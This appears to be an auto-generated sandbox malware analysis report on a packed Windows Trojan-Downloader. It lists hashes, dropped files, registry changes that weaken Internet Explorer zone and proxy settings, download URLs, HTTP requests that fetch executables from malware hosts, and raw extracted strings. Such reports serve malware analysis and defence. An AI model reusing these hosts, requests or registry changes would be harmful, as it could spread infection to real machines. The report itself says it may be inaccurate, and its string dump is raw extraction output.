Trojan.Generic.14783327_be544a694c
HEUR:Trojan-Downloader.Win32.Generic (Kaspersky), Trojan.Generic.14783327 (B) (Emsisoft), Trojan.Generic.14783327 (AdAware), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: be544a694c1caa48e6ac2df4f6421ec3
SHA1: 8a2e9233de4f4e0cd561acf3f787fa2c304f6899
SHA256: 097aad9946dae59bac73d27b63e9f809335e4ed5c370e5c7b1598b3add1d67cc
SSDeep: 12288:QhuzVyM/BisrxyEi64r/SEmUnz9KywQ7Kd21CgNbL8T:zmEijr/S1qz9K5kn
Size: 503296 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PackerUPXCompresorGratuitowwwupxsourceforgenet, UPolyXv05_v6
Company: no certificate found
Created at: 2015-06-30 18:16:46
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
uuuyunbo_53_1248.exe:1536
%original file name%.exe:652
The Trojan injects its code into the following process(es):
Setup_95101248.exe:1596
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process uuuyunbo_53_1248.exe:1536 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\setup_30004.exe (1930 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\setup_30004[1].exe (4277 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
The process Setup_95101248.exe:1596 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\XxShow\XxTongji.dll (11601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\browse.bmp (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\license.txt (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\CheckEnv.dll (2236 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\close.bmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\install.bmp (4289 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\WebCtrl.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\checkbox1.bmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\loading1.bmp (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\loading2.bmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\go.bmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\finish.bmp (5494 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\checkbox2.bmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\install_step01.bmp (14661 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\SkinBtn.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\install_step.bmp (15065 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\WndProc.dll (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\BgWorker.dll (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\init.bmp (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\cancel.bmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\bg.bmp (3624 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1.tmp (0 bytes)
The process %original file name%.exe:652 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
C:\Setup_95101248.exe (7386 bytes)
C:\uuuyunbo_53_1248.exe (7386 bytes)
Registry activity
The process uuuyunbo_53_1248.exe:1536 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6C EA D3 A1 DC 1D 84 10 AF 4C 78 AE 5C 53 D0 AA"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE security zone settings so that all local web-nodes without dots that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings so that all web-nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process Setup_95101248.exe:1596 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F1 48 E5 57 5E C5 41 D8 3B 33 2B DA A0 C2 68 43"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process %original file name%.exe:652 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "30 2A 76 C5 6A 1D A5 78 16 E0 F3 B3 3E E5 E9 2B"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE security zone settings so that all local web-nodes without dots that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings so that all web-nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
| MD5 | File path |
|---|---|
| f453688934086e01ed59d73ccfcd2c04 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\XxShow\XxTongji.dll |
| 33ec04738007e665059cf40bc0f0c22b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsx2.tmp\BgWorker.dll |
| 4e09ca0312aeaa4029d5cd50cb99871a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsx2.tmp\CheckEnv.dll |
| e4ec95271ff1bcebab49bdfed6817a22 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsx2.tmp\SkinBtn.dll |
| 00a0194c20ee912257df53bfe258ee4a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsx2.tmp\System.dll |
| 418a34a689d5f9bb85fc951168749edb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsx2.tmp\WebCtrl.dll |
| f0cb331dd4bd92a6ebce45e7cd1cf5ef | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsx2.tmp\WndProc.dll |
| ab73c0c2a23f913eabdc4cb24b75cbad | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsx2.tmp\nsDialogs.dll |
| 0a004e3415d3d4621b427d68650e3679 | c:\Setup_95101248.exe |
| 728d0bcfaf8ce89b1983bbd7891cf9f8 | c:\uuuyunbo_53_1248.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name:
Product Name: ?????
Product Version: 1.0.0.0
Legal Copyright: ?????? ????????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description: ?????
Comments: ??????????(http://www.eyuyan.com)
Language: English (United Kingdom)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| UPX0 | 4096 | 520192 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| UPX1 | 524288 | 430080 | 428032 | 5.37247 | e771329ce39b039ce5a1146ac018b9ec |
| .rsrc | 954368 | 77824 | 74240 | 4.59261 | 0bcbc538b675834e4553c6070205a4c5 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://bgp5.yandui.com/xlxc/Setup_95101248.exe | |
| hxxp://d.juezhao123.com/setup/setup_30004.exe | |
| hxxp://down.shm520.com/xlxc/Setup_95101248.exe | |
| xiazai.lianmengqudao1.com | |
| down.shijiakai.net | |
| www.jiuhuabuy.com | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY Unsupported/Fake Windows NT Version 5.0
ET CURRENT_EVENTS Potential Fast Flux Rogue Antivirus (Setup_245.exe)
ET POLICY HTTP Request on Unusual Port Possibly Hostile
Traffic
GET /setup/setup_30004.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: d.juezhao123.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 14 Aug 2015 19:34:12 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Sat, 08 Aug 2015 12:04:05 GMT
ETag: "409d8-9da10-51ccb8c913a21"
Accept-Ranges: bytes
Content-Length: 645648
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
[response body: binary PE executable (MZ header, "This program cannot be run in DOS mode", .text/.rdata/.data sections); raw bytes not reproduced] <<< skipped >>>
GET /xlxc/Setup_95101248.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: down.shm520.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 14 Aug 2015 11:44:19 GMT
Content-Type: application/octet-stream
Content-Length: 1363160
Last-Modified: Wed, 29 Jul 2015 19:29:18 GMT
Connection: keep-alive
ETag: "55b9298e-14ccd8"
X-Server-IP: 183.131.193.67
Accept-Ranges: bytes
[response body: binary PE executable (MZ header, "This program cannot be run in DOS mode", .text/.rdata/.data sections); raw bytes not reproduced] <<< skipped >>>
The Trojan connects to the servers at the following location(s):
.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx2.tmp\nsDialogs.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx2.tmp\nsDialogs.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx2.tmp
`.reloc
KERNEL32.DLL
MsgWaitForMultipleObjects
BgWorker.dll
GetProcessHeap
comdlg32.dll
nsDialogs.dll
All Files|*.*
Thawte Certification1
hXXp://ocsp.thawte.com0
.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0
hXXp://ts-ocsp.ws.symantec.com07
hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0<
hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
<VeriSign Class 3 Public Primary Certification Authority - G50
#hXXp://logo.verisign.com/vslogo.gif0
2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,
/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
hXXps://VVV.verisign.com/rpa0
hXXp://ocsp.verisign.com0;
/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0
hXXps://VVV.verisign.com/cps0*
#hXXp://logo.verisign.com/vslogo.gif04
#hXXp://crl.verisign.com/pca3-g5.crl04
hXXp://ocsp.verisign.com0
Could not resolve %s: %s; %s
%s:%d
Added %s:%d:%s to DNS cache
Resolve %s found illegal!
%5[^:]:%d:%5s
CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!
Connected to %s (%s) port %ld (#%ld)
User-Agent: %s
About to connect() to %s%s port %ld (#%ld)
Re-using existing connection! (#%ld) with host %s
%s://%s
IDN support not present, can't parse Unicode domains
<url> malformed
:]://%[^
[^:]:%[^
Protocol %s not supported or disabled in libcurl
http_proxy
%5[^:@]:%5[^@]
:%5[^@]
Port number too large: %lu
%s://%s%s%s:%hu%s%s%s
;type=%c
[%*45[0123456789abcdefABCDEF:.]%c
Couldn't find host %s in the _netrc file; using defaults
[email protected]
Couldn't resolve host '%s'
Couldn't resolve proxy '%s'
Connection #%ld to host %s left intact
operation aborted by callback
ioctl callback returned error %d
the ioctl callback returned %d
seek callback returned error %d
Operation timed out after %ld milliseconds with %lld bytes received
Operation timed out after %ld milliseconds with %lld out of %lld bytes received
Problem (%d) in the Chunked-Encoded data
HTTP server doesn't seem to support byte ranges. Cannot resume.
Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)
Rewinding stream by : %zd bytes on url %s (zero-length body)
Excess found in a non pipelined read: excess = %zu, size = %lld, maxdownload = %lld, bytecount = %lld
Rewinding stream by : %zu bytes on url %s (size = %lld, maxdownload = %lld, bytecount = %lld, nread = %zd)
No URL set!
Violate RFC 2616/10.3.2 and switch from POST to GET
Violate RFC 2616/10.3.3 and switch from POST to GET
Disables POST, goes with %s
Issue another request to this URL: '%s'
[^?&/:]://%c
unspecified error %d
%s cookie %s="%s" for domain %s, path %s, expire %lld
#HttpOnly_
skipped cookie with bad tailmatch domain: %s
skipped cookie with illegal dotcount domain: %s
httponly
23[^;
=]=I99[^;
%s%s%s
WARNING: failed to save cookies in %s
# Fatal libcurl error
# Netscape HTTP Cookie File
# hXXp://curl.haxx.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.
Send failure: %s
Recv failure: %s
[%s %s %s]
ssloc inet_ntop() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
getsockname() failed with errno %d: %s
getpeername() failed with errno %d: %s
Failed to connect to %s: %s
Trying %s...
sa_addr inet_ntop() failed with errno %d: %s
Failed to set SO_KEEPALIVE on fd %d
bind failed with errno %d: %s
Local port: %hu
Bind to local port %hu failed, trying next
Couldn't bind to '%s'
Local Interface %s is ip %s using address family %i
Name '%s' family %i resolved to '%s' family %i
TCP_NODELAY set
Could not set TCP_NODELAY: %s
couldn't connect to %s at %s:%d
Unable to parse FTP file list
Error in the SSH layer
Caller must register CURLOPT_CONV_ callback options
TFTP: No such user
TFTP: Unknown transfer ID
TFTP: Illegal operation
TFTP: Access Violation
TFTP: File Not Found
Login denied
Issuer check against peer certificate failed
Invalid LDAP URL
Unrecognized or bad HTTP Content or Transfer-Encoding
Problem with the SSL CA cert (path? access rights?)
Peer certificate cannot be authenticated with given CA certificates
Problem with the local SSL certificate
SSL peer certificate or SSH remote key was not OK
An unknown option was passed in to libcurl
A libcurl function was given a bad argument
Operation was aborted by an application callback
FTP: command REST failed
FTP: command PORT failed
HTTP response code said error
FTP: couldn't retrieve (RETR failed) the specified file
FTP: couldn't set file type
FTP: can't figure out the host in the PASV response
FTP: unknown 227 response format
FTP: unknown PASV reply
FTP: unknown PASS reply
FTP: The server did not accept the PRET command.
FTP: Accepting server connect has timed out
FTP: The server failed to connect to data port
FTP: weird server reply
A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.
URL using bad/illegal format or missing URL
Unsupported protocol
Unknown error %d (%#x)
Winsock version not supported
Protocol family not supported
Address family not supported
Operation not supported
Socket is unsupported
Protocol is unsupported
Protocol option is unsupported
Internal error removing splay node = %d
Internal error clearing splay node = %d
%d.%d.%d.%d
The requested URL returned error: %d
@I.po
6-q}k
version=1.0.1.8
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\XxShow\*.*
in.html?
1\"%CurrentUserName%"\LOCALS~1\Temp\nsx2.tmp
1248.exe
1638648
-2067134396
adm\LOCALS~1\Temp\XxShow\XxTongji.dll
95101248.exe
c:\Setup_95101248.exe
D:\Program Files\XxShow
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\XxShow
Setup_95101248.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
352650550
1245428
1114338
1114320
1573190
2162906
1376468
95101248
1507518
1573146
1507522
1507538
1048780
1442126
1573052
1835232
1376520
1638642
1310942
1310970
722076749
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>2.0.0.0
Setup_95101248.exe_1596_rwx_10004000_00001000:
callback%d
uuuyunbo_53_1248.exe_1536:
.text
`.rdata
@.data
.rsrc
@.reloc
8%u*@Sj%
t.Gj:W
j.Yf;
_tcPVj@
.PjRW
Internal error clearing splay node = %d
Internal error removing splay node = %d
Could not resolve %s: %s
init_resolve_thread() failed for %s; %s
getaddrinfo() failed for %s:%d; %s
%s:%d
Hostname %s was found in DNS cache
Connected to %s (%s) port %ld (#%ld)
smtp
;type=%c
Send failure: %s
Write callback asked for PAUSE when not supported!
[%s %s %s]
Failed to set SO_KEEPALIVE on fd %d
Failed to set SIO_KEEPALIVE_VALS on fd %d: %d
Couldn't bind to interface '%s'
Local Interface %s is ip %s using address family %i
Name '%s' family %i resolved to '%s' family %i
Couldn't bind to '%s'
getsockname() failed with errno %d: %s
Local port: %hu
Bind to local port %hu failed, trying next
bind failed with errno %d: %s
getpeername() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
ssloc inet_ntop() failed with errno %d: %s
connect to %s port %ld failed: %s
Failed to connect to %s port %ld: %s
Could not set TCP_NODELAY: %s
TCP_NODELAY set
sa_addr inet_ntop() failed with errno %d: %s
Trying %s...
Immediate connect fail for %s: %s
%s:%s
%sAuthorization: Basic %s
The requested URL returned error: %d
%s auth using %s with user '%s'
%s, d %s M d:d:d GMT
If-Modified-Since: %s
If-Unmodified-Since: %s
Last-Modified: %s
Referer: %s
Accept-Encoding: %s
Chunky upload is not supported by HTTP 1.0
Host: %s%s%s
Host: %s%s%s:%hu
PTF://
Range: bytes=%s
Content-Range: bytes %s%I64d/%I64d
Content-Range: bytes %s/%I64d
PTF://%s:%s@%s
%s HTTP/%s
%s%s%s%s%s%s%s%s%s%s%s
%s%s=%s
Internal HTTP POST error!
Content-Type: application/x-www-form-urlencoded
Failed sending HTTP POST request
Failed sending HTTP request
operation aborted by callback
Read callback asked for PAUSE when not supported!
seek callback returned error %d
the ioctl callback returned %d
ioctl callback returned error %d
--:--:--
%3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s
@Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds
d:d:d
d:d
0123456789
Unsupported protocol
URL using bad/illegal format or missing URL
A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.
FTP: weird server reply
FTP: The server failed to connect to data port
FTP: Accepting server connect has timed out
FTP: The server did not accept the PRET command.
FTP: unknown PASS reply
FTP: unknown PASV reply
FTP: unknown 227 response format
FTP: can't figure out the host in the PASV response
Error in the HTTP2 framing layer
FTP: couldn't set file type
FTP: couldn't retrieve (RETR failed) the specified file
HTTP response code said error
FTP: command PORT failed
FTP: command REST failed
Operation was aborted by an application callback
A libcurl function was given a bad argument
An unknown option was passed in to libcurl
SSL peer certificate or SSH remote key was not OK
Problem with the local SSL certificate
Peer certificate cannot be authenticated with given CA certificates
Problem with the SSL CA cert (path? access rights?)
Unrecognized or bad HTTP Content or Transfer-Encoding
Invalid LDAP URL
Issuer check against peer certificate failed
Login denied
TFTP: File Not Found
TFTP: Access Violation
TFTP: Illegal operation
TFTP: Unknown transfer ID
TFTP: No such user
Caller must register CURLOPT_CONV_ callback options
Error in the SSH layer
Unable to parse FTP file list
SSL public key does not match pinned public key
SSL server certificate status verification FAILED
Protocol option is unsupported
Protocol is unsupported
Socket is unsupported
Operation not supported
Address family not supported
Protocol family not supported
Winsock version not supported
Unknown error %d (%#x)
%d.%d.%d.%d
CLIENT libcurl 7.44.0-DEV
MATCH %s %s %s
DEFINE %s %s
WSAStartup failed (%d)
insufficient winsock version to support telnet
%s IAC %s
%s IAC %d
%s %s %s
%s %s %d
%s %d %d
Sending data failed (%d)
%s IAC SB
%s (unsupported)
%d (unknown)
USER,%s
7[^= ]%*[ =]%5s
Syntax error in telnet option: %s
Unknown telnet option %s
%c%c%c%c%s%c%c
%c%c%c%c
7[^,],7s
%c%s%c%s
WS2_32.DLL
failed to load WS2_32.DLL (%d)
failed to find WSACreateEvent function (%d)
failed to find WSACloseEvent function (%d)
failed to find WSAEventSelect function (%d)
failed to find WSAEnumNetworkEvents function (%d)
WSACreateEvent failed (%d)
WSAEnumNetworkEvents failed (%d)
WSACloseEvent failed (%d)
FreeLibrary(wsock2) failed (%d)
TFTP
set timeouts for state %d; Total %ld, retry %d maxtry %d
got option=(%s) value=(%s)
blksize is larger than max supported
%s (%d)
blksize is smaller than min supported
%s (%ld)
%s (%d) %s (%d)
invalid tsize -:%s:- value in OACK packet
%s%c%s%c
tftp_send_first: internal error
Received last DATA packet block %d again.
Received unexpected DATA packet block %d, expecting block %d
Timeout waiting for block %d ACK. Retries = %d
tftp_rx: internal error
Received ACK for block %d, expecting %d
tftp_tx: giving up waiting for block %d ack
tftp_tx: internal error, event: %i
TFTP finished
bind() failed; %s
TFTP response timeout
LDAP local: LDAP Vendor = %s ; LDAP Version = %d
LDAP local: %s
LDAP local: trying to establish %s connection
LDAP local: Cannot connect to %s:%ld
LDAP local: ldap_simple_bind_s %s
LDAP remote: %s
There are more than %d entries
LOGIN %s %s
AUTHENTICATE %s %s
AUTHENTICATE %s
No known authentication mechanisms supported!
LIST "%s" *
SELECT %s
FETCH %s BODY[%s]<%s>
FETCH %s BODY[%s]
